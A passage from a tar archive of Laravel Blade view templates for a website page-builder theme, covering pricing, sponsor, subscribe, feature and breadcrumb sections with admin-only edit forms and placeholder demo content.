class="extra-text">{{ $plan->tag }} {{ __('frontend.recommended') }}</span> </div> @endif </div> <ul class="pricing-list"> @if (!empty($plan->feature_list)) @php $str = $plan->feature_list; $array_items = explode(",",$str); @endphp @foreach ($array_items as $item) <li>{{ $item }}</li> @endforeach @unset ($item) @endif @if (!empty($plan->non_feature_list)) @php $str = $plan->non_feature_list; $array_items = explode(",",$str); @endphp @foreach ($array_items as $item) <li class="text-decoration-line-through">{{ $item }}</li> @endforeach @unset ($item) @endif </ul> <a href="{{ $plan->button_url }}" class="primary-btn"> <span class="text">{{ $plan->button_name }}</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> <p class="mt-3 text-white">{{ $plan->extra_text }}</p> </div> </div> </div> @else <div class="col-md-6 col-lg-4 wow fadeInDown" data-wow-duration="0.7s" data-wow-delay="0.1s"> @if(Auth::user()) @can('section check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="plan.edit"> <input type="hidden" name="single_id" value="{{ $plan->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <div class="pricing-card"> <div class="price-text"> <h5>{{ $plan->currency }}{{ $plan->price }}</h5> </div> <div class="body"> <div class="pricing-text"> <h5>{{ $plan->name }}</h5> @if (!empty($plan->tag)) <div> <span class="extra-text">{{ $plan->tag }} {{ __('frontend.recommended') }}</span> </div> @endif </div> <ul class="pricing-list"> @if (!empty($plan->feature_list)) @php $str = $plan->feature_list; $array_items = explode(",",$str); @endphp @foreach ($array_items as $item) <li>{{ $item }}</li> @endforeach @unset ($item) @endif @if (!empty($plan->non_feature_list)) @php $str = $plan->non_feature_list; $array_items = explode(",",$str); @endphp @foreach ($array_items as $item) <li class="text-decoration-line-through">{{ $item }}</li> @endforeach @unset ($item) @endif </ul> <a href="{{ $plan->button_url }}" class="primary-btn"> <span class="text">{{ $plan->button_name }}</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> <p class="mt-3 text-white">{{ $plan->extra_text }}</p> </div> </div> </div> @endif @endforeach @unset ($plan) </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row"> <div class="col-md-6 col-lg-4 wow fadeInDown" data-wow-duration="0.7s" data-wow-delay="0.1s"> <div class="pricing-card"> <div class="price-text"> <h5>$49</h5> </div> <div class="body"> <div class="pricing-text"> <h5>Basic</h5> <div> <span>Monhtly</span> </div> </div> <ul class="pricing-list"> <li>5Gb Bandwith</li> <li>7/24 Support</li> <li>Free Support</li> <li>Special Request</li> </ul> <a href="#" class="primary-btn"> <span class="text">Select Plan</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> </div> </div> </div> <div class="col-md-6 col-lg-4 wow fadeInDown" data-wow-duration="0.7s" data-wow-delay="0.1s"> <div class="pricing-card"> <div class="price-text"> <h5>$69</h5> </div> <div class="body"> <div class="pricing-text"> <h5>Business</h5> <div> <span>Monhtly</span> </div> </div> <ul class="pricing-list"> <li>50Gb Bandwith</li> <li>7/24 Support</li> <li>Free Support</li> <li>Special Request</li> </ul> <a href="#" class="primary-btn"> <span class="text">Select Plan</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> </div> </div> </div> <div class="col-md-6 col-lg-4 wow fadeInDown" data-wow-duration="0.7s" data-wow-delay="0.1s"> <div class="pricing-card"> <div class="price-text"> <h5>$79</h5> </div> <div class="body"> <div class="pricing-text"> <h5>Premium</h5> <div> <span>Monhtly</span> </div> </div> <ul class="pricing-list"> <li>200Gb Bandwith</li> <li>7/24 Support</li> <li>Free Support</li> <li>Special Request</li> </ul> <a href="#" class="primary-btn"> <span class="text">Select Plan</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> </div> </div> </div> </div> @endif @endif </div> </section> <!--// Pricing Section End //--> @if(Auth::user()) @can('section check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="plan.create"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }} </button> </form> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="plan.create"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.add_plan') }} </button> </form> </div> </div> @endcan @endif �������������������������������������������������������������������������������views/frontend/sections/sponsor/sponsor-style1.blade.php��������������������������������������������0000644�����������������00000016373�14765366572�0017612 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('section check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif @if (is_countable($sponsors_style1) && count($sponsors_style1) > 0) <!--// Partners Section Start //--> <div class="partners-section section"> <div class="container"> @if(Auth::user()) @can('section check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="owl-carousel owl-theme" id="partners-carousel"> @foreach ($sponsors_style1 as $item) <div class="item"> @if(Auth::user()) @can('section check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="sponsor.edit"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <div class="partner-item"> <a href="{{ $item->url }}"> <img src="{{ asset('uploads/img/sponsor/'.$item->section_image) }}" alt="sponsor image" class="img-fluid"> </a> </div> </div> @endforeach @unset ($item) </div> </div> </div> <!--// Partners Section End //--> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <!--// Partners Section Start //--> <div class="partners-section section"> <div class="container"> @if(Auth::user()) @can('section check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="owl-carousel owl-theme" id="partners-carousel"> <div class="item"> <div class="partner-item"> <a href="#"> <img src="{{ asset('uploads/img/dummy/170x75.jpg') }}" alt="sponsor image" class="img-fluid"> </a> </div> </div> <div class="item"> <div class="partner-item"> <a href="#"> <img src="{{ asset('uploads/img/dummy/170x75.jpg') }}" alt="sponsor image" class="img-fluid"> </a> </div> </div> <div class="item"> <div class="partner-item"> <a href="#"> <img src="{{ asset('uploads/img/dummy/170x75.jpg') }}" alt="sponsor image" class="img-fluid"> </a> </div> </div> <div class="item"> <div class="partner-item"> <a href="#"> <img src="{{ asset('uploads/img/dummy/170x75.jpg') }}" alt="sponsor image" class="img-fluid"> </a> </div> </div> <div class="item"> <div class="partner-item"> <a href="#"> <img src="{{ asset('uploads/img/dummy/170x75.jpg') }}" alt="sponsor image" class="img-fluid"> </a> </div> </div> </div> </div> </div> <!--// Partners Section End //--> @endif @endif @if(Auth::user()) @can('section check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="sponsor.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.add_sponsor') }} </button> </form> </div> </div> @endcan @endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/subscribe/subscribe-style1.blade.php����������������������������������������0000644�����������������00000000061�14765366572�0020331 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<livewire:subscribe-post-easier style="style2"/> �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/feature/feature-style1.blade.php��������������������������������������������0000644�����������������00000033640�14765366572�0017466 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('section check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Resume Section Start //--> <section class="section pb-minus-76 bg-primary-light" id="myresume"> <div class="container"> @if(Auth::user()) @can('section check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif @isset ($feature_section_style1) <div class="row"> <div class="col-lg-6"> <div class="section-heading-left"> <span>@php echo html_entity_decode($feature_section_style1->section_title); @endphp</span> <h2>@php echo html_entity_decode($feature_section_style1->title); @endphp</h2> </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row"> <div class="col-lg-6"> <div class="section-heading-left"> <span>Feature</span> <h2>Our Features</h2> </div> </div> </div> @endif @endisset @if (is_countable($features_style1) && count($features_style1) > 0) <div class="row"> @foreach ($features_style1 as $item) <div class="col-lg-6 wow fadeInDown" data-wow-duration="0.5s" data-wow-delay="0.{{ $loop->iteration }}s"> @if(Auth::user()) @can('section check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="feature.edit"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <div class="resume-item"> <div class="body"> @if ($item->type == "icon") @if (!empty($item->icon)) <div class="icon-outer-line"> <div class="icon-inner-line"> <span class="{{ $item->icon }}"></span> </div> </div> @endif @else <img src="{{ asset('uploads/img/feature/'.$item->section_image) }}" class="me-3 img-fluid custom-max-width-110" alt="feature image"> @endif <div class="text"> <h6>@php echo html_entity_decode($item->subtitle); @endphp</h6> <h5>@php echo html_entity_decode($item->title); @endphp</h5> <span>@php echo html_entity_decode($item->description); @endphp</span> </div> </div> </div> </div> @endforeach @unset ($item) </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row"> <div class="col-lg-6 wow fadeInDown" data-wow-duration="0.5s" data-wow-delay="0.1s"> <div class="resume-item"> <div class="body"> <div class="icon-outer-line"> <div class="icon-inner-line"> <span class="fab fa-google"></span> </div> </div> <div class="text"> <h6>Google LLC</h6> <h5>Web Designer</h5> <span>2018-2024</span> </div> </div> </div> </div> <div class="col-lg-6 wow fadeInDown" data-wow-duration="0.5s" data-wow-delay="0.2s"> <div class="resume-item"> <div class="body"> <div class="icon-outer-line"> <div class="icon-inner-line"> <span class="fab fa-wordpress"></span> </div> </div> <div class="text"> <h6>Wordpress</h6> <h5>Web Developer</h5> <span>2016-2018</span> </div> </div> </div> </div> <div class="col-lg-6 wow fadeInDown" data-wow-duration="0.5s" data-wow-delay="0.3s"> <div class="resume-item"> <div class="body"> <div class="icon-outer-line"> <div class="icon-inner-line"> <span class="fab fa-dribbble"></span> </div> </div> <div class="text"> <h6>Dribbble</h6> <h5>UI Designer</h5> <span>2012-2014</span> </div> </div> </div> </div> <div class="col-lg-6 wow fadeInDown" data-wow-duration="0.5s" data-wow-delay="0.4s"> <div class="resume-item"> <div class="body"> <div class="icon-outer-line"> <div class="icon-inner-line"> <span class="fab fa-youtube"></span> </div> </div> <div class="text"> <h6>Youtube LLC</h6> <h5>Seo Manager</h5> <span>2017-2019</span> </div> </div> </div> </div> <div class="col-lg-6 wow fadeInDown" data-wow-duration="0.5s" data-wow-delay="0.5s"> <div class="resume-item"> <div class="body"> <div class="icon-outer-line"> <div class="icon-inner-line"> <span class="fab fa-amazon"></span> </div> </div> <div class="text"> <h6>Amazon</h6> <h5>Sales Manager</h5> <span>2012-2014</span> </div> </div> </div> </div> <div class="col-lg-6 wow fadeInDown" data-wow-duration="0.5s" data-wow-delay="0.6s"> <div class="resume-item"> <div class="body"> <div class="icon-outer-line"> <div class="icon-inner-line"> <span class="fab fa-behance"></span> </div> </div> <div class="text"> <h6>Behance</h6> <h5>Graphic Designer</h5> <span>2012-2014</span> </div> </div> </div> </div> </div> @endif @endif </div> </section> <!--// Resume Section End //--> @if(Auth::user()) @can('section check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="feature.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="feature.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.add_feature') }} </button> </form> </div> </div> @endcan @endif ������������������������������������������������������������������������������������������������views/frontend/sections/breadcrumb/breadcrumb-style1.blade.php��������������������������������������0000644�����������������00000124103�14765366572�0020607 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if ($page_builder->page_name == 'blog-index' && isset($blog_section)) @if(Auth::user()) @can('blog check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <div class="page-banner-wrap bg-cover text-capitalize"> <div class="container"> <div class="row"> <div class="col-12 col-xl-6 ps-xl-0 pe-xl-0 offset-xl-3 col-lg-8 offset-lg-2 text-center text-white"> <div class="page-heading"> @isset ($blog_section) <h1>{{ $blog_section->breadcrumb_title }}</h1> @else <h1>{{ __('content.our_blogs') }}</h1> @endisset </div> <nav class="justify-content-center"> <ol class="breadcrumb custom-breadcrumb"> @isset ($blog_section) @php $str = $blog_section->breadcrumb_item; $array_items = explode(",",$str); @endphp @foreach ($array_items as $item) @if (!$loop->last) <li class="breadcrumb-item">@php echo html_entity_decode($item); @endphp</li> @else <li class="breadcrumb-item text-white active" aria-current="page">@php echo html_entity_decode($item); @endphp</li> @endif @endforeach @unset($item) @else <li class="breadcrumb-item"><a href="{{ url('/') }}">{{ __('frontend.home') }}</a></li> <li class="breadcrumb-item text-white active" aria-current="page">{{ __('content.our_blogs') }}</li> @endisset </ol> </nav> </div> </div> <div class="page-banner-shape"> <img src="{{ asset('uploads/img/dummy/icons/banner-shape.png') }}" alt="shape icon"> </div> </div> </div> @if(Auth::user()) @can('blog check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="blog.index"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_breadcrumb') }} </button> </form> </div> </div> @endcan @endif @elseif ($page_builder->page_name == 'service-detail-show' && isset($service)) @if(Auth::user()) @can('service check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Breadcrumb Section Start //--> <section class="breadcrumb-section section" data-scroll-index="1" @if (!empty($service_content->custom_breadcrumb_image)) @if ($service_content->breadcrumb_status == 'yes') data-bg-image-path="{{ asset('uploads/img/service/breadcrumb/'.$service_content->custom_breadcrumb_image) }}" @endif @elseif (!empty($breadcrumb_image->section_image)) data-bg-image-path="{{ asset('uploads/img/breadcrumb/'.$breadcrumb_image->section_image) }}" @endif> <div class="container"> @if(Auth::user()) @can('service check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row justify-content-center"> <div class="col-lg-8"> <div class="breadcrumb-inner"> <h1>{{ $service->title }}</h1> <ul class="breadcrumb-links"> <li><a href="{{ url('/') }}">{{ __('frontend.home') }}</a></li> <li class="active">{{ $service->title }}</li> </ul> </div> </div> </div> </div> </section> <!--// Breadcrumb Section end //--> @if(Auth::user()) @can('service check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="service-content.create"> <input type="hidden" name="style" value="{{ $service->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_breadcrumb_and_page_seo') }} </button> </form> </div> </div> @endcan @endif @elseif ($page_builder->page_name == 'service-category-index' && isset($category)) @if(Auth::user()) @can('service check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Breadcrumb Section Start //--> <section class="breadcrumb-section section" data-scroll-index="1" @if (!empty($page_builder->custom_breadcrumb_image) && $page_builder->breadcrumb_status == 'yes') data-bg-image-path="{{ asset('uploads/img/page_builder/breadcrumb/'.$page_builder->custom_breadcrumb_image) }}" @elseif (!empty($breadcrumb_image->section_image)) data-bg-image-path="{{ asset('uploads/img/breadcrumb/'.$breadcrumb_image->section_image) }}" @endif> <div class="container"> @if(Auth::user()) @can('service check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row justify-content-center"> <div class="col-lg-8"> <div class="breadcrumb-inner"> <h1>{{ $category->category_name }}</h1> <ul class="breadcrumb-links"> <li><a href="{{ url('/') }}">{{ __('frontend.home') }}</a></li> <li class="active">{{ $category->category_name }}</li> </ul> </div> </div> </div> </div> </section> <!--// Breadcrumb Section end //--> @if(Auth::user()) @can('service check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="page-builder.edit"> <input type="hidden" name="style" value="{{ $page_builder->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_breadcrumb_and_page_seo') }} </button> </form> </div> </div> @endcan @endif @elseif ($page_builder->page_name == 'team-category-index' && isset($category)) @if(Auth::user()) @can('team check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Breadcrumb Section Start //--> <section class="breadcrumb-section section" data-scroll-index="1" @if (!empty($page_builder->custom_breadcrumb_image) && $page_builder->breadcrumb_status == 'yes') data-bg-image-path="{{ asset('uploads/img/page_builder/breadcrumb/'.$page_builder->custom_breadcrumb_image) }}" @elseif (!empty($breadcrumb_image->section_image)) data-bg-image-path="{{ asset('uploads/img/breadcrumb/'.$breadcrumb_image->section_image) }}" @endif> <div class="container"> @if(Auth::user()) @can('team check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row justify-content-center"> <div class="col-lg-8"> <div class="breadcrumb-inner"> <h1>{{ $category->category_name }}</h1> <ul class="breadcrumb-links"> <li><a href="{{ url('/') }}">{{ __('frontend.home') }}</a></li> <li class="active">{{ $category->category_name }}</li> </ul> </div> </div> </div> </div> </section> <!--// Breadcrumb Section end //--> @if(Auth::user()) @can('team check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="page-builder.edit"> <input type="hidden" name="style" value="{{ $page_builder->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_breadcrumb_and_page_seo') }} </button> </form> </div> </div> @endcan @endif @elseif ($page_builder->page_name == 'portfolio-detail-show' && isset($portfolio)) @if(Auth::user()) @can('portfolio check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Breadcrumb Section Start //--> <section class="breadcrumb-section section" data-scroll-index="1" @if (!empty($portfolio_content->custom_breadcrumb_image)) @if ($portfolio_content->breadcrumb_status == 'yes') data-bg-image-path="{{ asset('uploads/img/portfolio/breadcrumb/'.$portfolio_content->custom_breadcrumb_image) }}" @endif @elseif (!empty($breadcrumb_image->section_image)) data-bg-image-path="{{ asset('uploads/img/breadcrumb/'.$breadcrumb_image->section_image) }}" @endif> <div class="container"> @if(Auth::user()) @can('portfolio check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row justify-content-center"> <div class="col-lg-8"> <div class="breadcrumb-inner"> <h1>{{ $portfolio->title }}</h1> <ul class="breadcrumb-links"> <li><a href="{{ url('/') }}">{{ __('frontend.home') }}</a></li> <li class="active">{{ $portfolio->title }}</li> </ul> </div> </div> </div> </div> </section> <!--// Breadcrumb Section end //--> @if(Auth::user()) @can('portfolio check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="portfolio-content.create"> <input type="hidden" name="style" value="{{ $portfolio->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_breadcrumb_and_page_seo') }} </button> </form> </div> </div> @endcan @endif @elseif ($page_builder->page_name == 'portfolio-category-index' && isset($category)) @if(Auth::user()) @can('portfolio check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Breadcrumb Section Start //--> <section class="breadcrumb-section section" data-scroll-index="1" @if (!empty($page_builder->custom_breadcrumb_image) && $page_builder->breadcrumb_status == 'yes') data-bg-image-path="{{ asset('uploads/img/page_builder/breadcrumb/'.$page_builder->custom_breadcrumb_image) }}" @elseif (!empty($breadcrumb_image->section_image)) data-bg-image-path="{{ asset('uploads/img/breadcrumb/'.$breadcrumb_image->section_image) }}" @endif> <div class="container"> @if(Auth::user()) @can('portfolio check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row justify-content-center"> <div class="col-lg-8"> <div class="breadcrumb-inner"> <h1>{{ $category->category_name }}</h1> <ul class="breadcrumb-links"> <li><a href="{{ url('/') }}">{{ __('frontend.home') }}</a></li> <li class="active">{{ $category->category_name }}</li> </ul> </div> </div> </div> </div> </section> <!--// Breadcrumb Section end //--> @if(Auth::user()) @can('portfolio check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="page-builder.edit"> <input type="hidden" name="style" value="{{ $page_builder->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_breadcrumb_and_page_seo') }} </button> </form> </div> </div> @endcan @endif @elseif ($page_builder->page_name == 'blog-detail-show' && isset($blog)) @if(Auth::user()) @can('blog check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Breadcrumb Section Start //--> <section class="breadcrumb-section section" data-scroll-index="1" @if (!empty($blog->custom_breadcrumb_image)) @if ($blog->breadcrumb_status == 'yes') data-bg-image-path="{{ asset('uploads/img/blog/breadcrumb/'.$blog->custom_breadcrumb_image) }}" @endif @elseif (!empty($breadcrumb_image->section_image)) data-bg-image-path="{{ asset('uploads/img/breadcrumb/'.$breadcrumb_image->section_image) }}" @endif> <div class="container"> @if(Auth::user()) @can('blog check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row justify-content-center"> <div class="col-lg-8"> <div class="breadcrumb-inner"> <h1>{{ $blog->title }}</h1> <ul class="breadcrumb-links"> <li><a href="{{ url('/') }}">{{ __('frontend.home') }}</a></li> <li class="active">{{ $blog->title }}</li> </ul> </div> </div> </div> </div> </section> <!--// Breadcrumb Section end //--> @if(Auth::user()) @can('blog check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="blog.create"> <input type="hidden" name="style" value="{{ $blog->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_breadcrumb_and_page_seo') }} </button> </form> </div> </div> @endcan @endif @elseif ($page_builder->page_name == 'blog-category-index' && isset($category)) @if(Auth::user()) @can('blog check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Breadcrumb Section Start //--> <section class="breadcrumb-section section" data-scroll-index="1" @if (!empty($page_builder->custom_breadcrumb_image) && $page_builder->breadcrumb_status == 'yes') data-bg-image-path="{{ asset('uploads/img/page_builder/breadcrumb/'.$page_builder->custom_breadcrumb_image) }}" @elseif (!empty($breadcrumb_image->section_image)) data-bg-image-path="{{ asset('uploads/img/breadcrumb/'.$breadcrumb_image->section_image) }}" @endif> <div class="container"> @if(Auth::user()) @can('blog check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row justify-content-center"> <div class="col-lg-8"> <div class="breadcrumb-inner"> <h1>{{ $category->category_name }}</h1> <ul class="breadcrumb-links"> <li><a href="{{ url('/') }}">{{ __('frontend.home') }}</a></li> <li class="active">{{ $category->category_name }}</li> </ul> </div> </div> </div> </div> </section> <!--// Breadcrumb Section end //--> @if(Auth::user()) @can('blog check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="page-builder.edit"> <input type="hidden" name="style" value="{{ $page_builder->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_breadcrumb_and_page_seo') }} </button> </form> </div> </div> @endcan @endif @elseif ($page_builder->page_name == 'blog-tag-index' && isset($tag_name)) @if(Auth::user()) @can('blog check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Breadcrumb Section Start //--> <section class="breadcrumb-section section" data-scroll-index="1" @if (!empty($page_builder->custom_breadcrumb_image) && $page_builder->breadcrumb_status == 'yes') data-bg-image-path="{{ asset('uploads/img/page_builder/breadcrumb/'.$page_builder->custom_breadcrumb_image) }}" @elseif (!empty($breadcrumb_image->section_image)) data-bg-image-path="{{ asset('uploads/img/breadcrumb/'.$breadcrumb_image->section_image) }}" @endif> <div class="container"> @if(Auth::user()) @can('blog check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row justify-content-center"> <div class="col-lg-8"> <div class="breadcrumb-inner"> <h1>{{ $tag_name }}</h1> <ul class="breadcrumb-links"> <li><a href="{{ url('/') }}">{{ __('frontend.home') }}</a></li> <li class="active">{{ $tag_name }}</li> </ul> </div> </div> </div> </div> </section> <!--// Breadcrumb Section end //--> @if(Auth::user()) @can('blog check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="page-builder.edit"> <input type="hidden" name="style" value="{{ $page_builder->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_breadcrumb_and_page_seo') }} </button> </form> </div> </div> @endcan @endif @elseif ($page_builder->page_name == 'career-detail-show' && isset($career)) @if(Auth::user()) @can('career check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Breadcrumb Section Start //--> <section class="breadcrumb-section section" data-scroll-index="1" @if (!empty($career_content->custom_breadcrumb_image)) @if ($career_content->breadcrumb_status == 'yes') data-bg-image-path="{{ 